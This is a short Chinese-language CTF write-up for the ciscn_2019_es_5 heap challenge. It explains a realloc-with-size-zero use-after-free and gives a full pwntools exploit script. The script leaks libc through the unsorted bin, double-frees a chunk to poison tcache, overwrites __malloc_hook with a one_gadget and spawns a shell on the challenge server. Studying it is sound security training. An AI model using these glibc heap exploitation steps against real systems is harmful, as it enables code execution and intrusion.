ciscn_2019_es_5
首先,檢查一下的保護機制
然後,我們用IDA分析一下
Create的時候,沒有檢查size,因此size可以爲0
Edit的時候,調用了realloc,並且沒有檢查size是否爲0,如果爲0,則這個chunk會被free掉,但是堆指針沒有從flist堆數組裏移除,這就造成了UAF。
#coding:utf8
from pwn import *
#sh = process('./ciscn_2019_es_5')
sh = remote('node3.buuoj.cn',25051)
libc = ELF('/lib/x86_64-linux-gnu/libc-2.27.so')
malloc_hook_s = libc.symbols['__malloc_hook']
one_gadget_s = 0x10a38c
def add(size,content):
sh.sendlineafter('Your choice:','1')
sh.sendlineafter('size?>',str(size))
sh.sendafter('content:',content)
def edit(index,content,have_content = True):
sh.sendlineafter('Your choice:','2')
sh.sendlineafter('Index:',str(index))
if have_content:
sh.sendafter('New content:',content)
def show(index):
sh.sendlineafter('Your choice:','3')
sh.sendlineafter('Index:',str(index))
def delete(index):
sh.sendlineafter('Your choice:','4')
sh.sendlineafter('Index:',str(index))
#0
add(0x100,'a')
for i in range(7):
add(0x100,'b')
for i in range(1,8):
delete(i)
#得到unsorted bin
delete(0)
add(0x30,'a')
#泄露地址
show(0)
sh.recvuntil('Content: ')
main_arena_xx = u64(sh.recv(6).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_xx & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
one_gadget_addr = libc_base + one_gadget_s
print 'libc_base=',hex(libc_base)
print 'malloc_hook_addr=',hex(malloc_hook_addr)
print 'one_gadget_addr=',hex(one_gadget_addr)
add(0,'') #1
#realloc釋放chunk後,程序沒有清空指針,因此,我們再delete一次,就實現了double free
edit(1,'',False)
delete(1)
add(0x10,p64(malloc_hook_addr))
#寫malloc_hook
add(0x10,p64(one_gadget_addr))
#getshell
sh.sendlineafter('Your choice:','1')
sh.interactive()